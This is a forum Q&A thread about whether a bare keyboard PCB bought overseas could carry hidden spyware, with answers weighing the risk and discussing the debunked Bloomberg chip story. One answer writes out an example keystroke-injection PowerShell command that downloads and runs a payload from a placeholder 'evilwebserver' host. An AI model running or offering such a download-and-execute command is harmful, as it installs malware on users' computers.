# Can PCB's contain spyware?

Tags: hardware, spyware

I'm thinking about purchasing a keyboard PCB from someone overseas, but I'm not 100% sure if it's safe.

The firmware I'm going to install is QMK which is open source and I feel safe using it.

However, the PCB itself is making me a bit paranoid..

Answer (score 5):

Possible, yes. But hardly probable.

Unless you have motives to believe someone would put lots of money into an operation to infect you specifically, you don't need to worry. Not only a custom hardware implant is expensive to create, but you will flash a custom firmware too. Software implants are cheaper and easier.

If you are a special target for working for a government, large corporation, news  or human rights organization, ask your technical support team for directions. If you are not, you are being overly paranoid. Even if you are part of the target list, infecting your systems using software is way easier, faster, reliable, and easily deniable. Hiding a hardware implant is way more difficult than running a software implant on your computer that runs only in memory, forces a reboot if discovered and leave no traces.

If you are paranoid enough to distrust the keyboard you are buying, consider building it yourself, with off the shelf pieces you buy yourself. It's overkill in my opinion, but will make you feel safer.

Answer (score 1):

Assuming you mean you are purchasing a true bare PCB and not a pre-populated PCB, it would be nearly impossible for it to contain an undetectable hidden chip.  Keyboards are almost universally manufactured on double-sided PCBs, and most have wide open trace runs to save on weight and copper.  They're often translucent enough that there's no ground plane to hide a chip from a simple eyeball scan, and there generally is not enough room between the layers to embed a hidden chip (embedded components have been built into pockets carved from the middle layers of multiplanar boards, but I've never heard of this being done with a double-sided board.)

One thing a chip hidden in a keyboard needs is a way to communicate with the outside world.  There is no way to be sure that the keyboard will be used in a location with public Wi-Fi, so RF is out; the only thing the malicious actor can depend on is a USB connection to a host computer.  Malicious keyboards, such as the Bash Bunny or Rubber Ducky, work by convincing the host computer to execute commands on their behalf, but doing so without leaving traces is quite difficult.

The malicious chip would have to wait for the system to boot and for the user to log in.  Once ready, it would type something like `<Windows>+R powershell.exe<enter>IEX (New-Object Net.WebClient).DownloadString('https://evilwebserver/payload.ps1');exit;<enter>"` to install some malware.  All these keyboard based approaches temporarily flash windows on the screen, and they leave evidence in the event or browser logs.  They're also highly specific to the host OS; running them on a mac or linux would yield nothing but lulz.

Furthermore, unlike software which can be deleted once it's been deployed, these devices remain forever as evidence of their existence.  An adversary sophisticated enough to deploy such devices wouldn't risk getting caught by sending them to every rando on the Internet who purchases a bare board.  They would only risk sending boards infected with these chips to their highest value targets, such as bank executives, CEOs, government or military targets, etc.  They know that once they're discovered by a disgruntled government agency, the perpetrators will be hunted down.  And when they're outed by a news reporter, blogger, or security researcher, the seller will be put out of business and probably jailed.

The risk is close enough to zero that you should be able to order them comfortably.

Comment: It isn't really impossible to [embed chip](https://patents.google.com/patent/US7630209) [into a board](http://www.hwtools.net/jpg/S5EX_41.jpg). Smartcard chips are embedded on credit cards and they're plenty powerful to run various applications. It's not going to be something you can do at your back garage, but a sufficiently advanced attacker might be able to do that.

Comment: Sure, it’s technically possible, but highly unlikely that it would be undetectable, and highly likely it wouldn’t randomly be sent to the asker, for all the reasons I gave.  Which is pretty much what I said in my answer.

Answer (score -1):

It is possible, and [has been reported to have happened before](https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies), but that [report](https://www.techdirt.com/articles/20181025/00472140907/detailed-thorough-debunking-bloombergs-sketchy-story-about-supply-chain-hack.shtml) [was](https://risky.biz/RB517_feature/) [proven](https://www.businessinsider.com/security-community-voicing-increasing-doubts-about-bombshell-bloomberg-chinese-chip-hacking-2018-10) [false](https://www.washingtonpost.com/blogs/erik-wemple/wp/2018/10/22/your-move-bloomberg/). The Bloomberg article reported that an extra chip had been added to AWS server motherboards by a vendor, contrary to design, that was designed to exfiltrate sensitive data.

Many people thought that the story was plausible, so it's not a stretch to think that any PCB could be maliciously made.  Yet it's simply impractical, especially for an attack aimed at a normal consumer.

Such an attack would be very sophisticated, and would depend on being able to hide minor changes to mass produced PCBs.  A one-off printing of a custom PCB would be a very costly attack with a low payoff and a high risk of being detected.  Anyone capable of doing such an attack will also do risk assessments of all of their attacks.  Unless you know that you are a target for nation-state surveillance, this type of attack isn't worth worrying over.

Since such an attack would leave hard evidence, it could not be concealed indefinitely or erased like software can.  Attempting such an attack would reveal which manufacturer(s) you have compromised, which would use up their usefulness to you in case you have a dire need to use them in the future.  After all, a factory that can't sell its compromised products won't be able to spread that compromise any more.

Comment: That Bloomberg story has been thoroughly debunked, and Amazon has vehemently denied ever finding any such additional extra chips on their servers.

Comment: @Xander (and anyone), do you have a source where it's debunked?  I'd love to change the wording from "may have happned before" to "was reported to have happened, but the report was proven false" with links.

Comment: That wording I think is much better.

Comment: @Xander, thank you for the suggestion.  And anyone: I'd still prefer to link to something that disproves the Bloomberg article, so if you have suggestions, I'm open to them... (Otherwise, it'll be a few days before I can do a proper search.)

Comment: You don't really have to do much searching. 
 
https://www.techdirt.com/articles/20181025/00472140907/detailed-thorough-debunking-bloombergs-sketchy-story-about-supply-chain-hack.shtml and 
https://risky.biz/RB517_feature/ and https://www.businessinsider.com/security-community-voicing-increasing-doubts-about-bombshell-bloomberg-chinese-chip-hacking-2018-10 and https://www.washingtonpost.com/blogs/erik-wemple/wp/2018/10/22/your-move-bloomberg/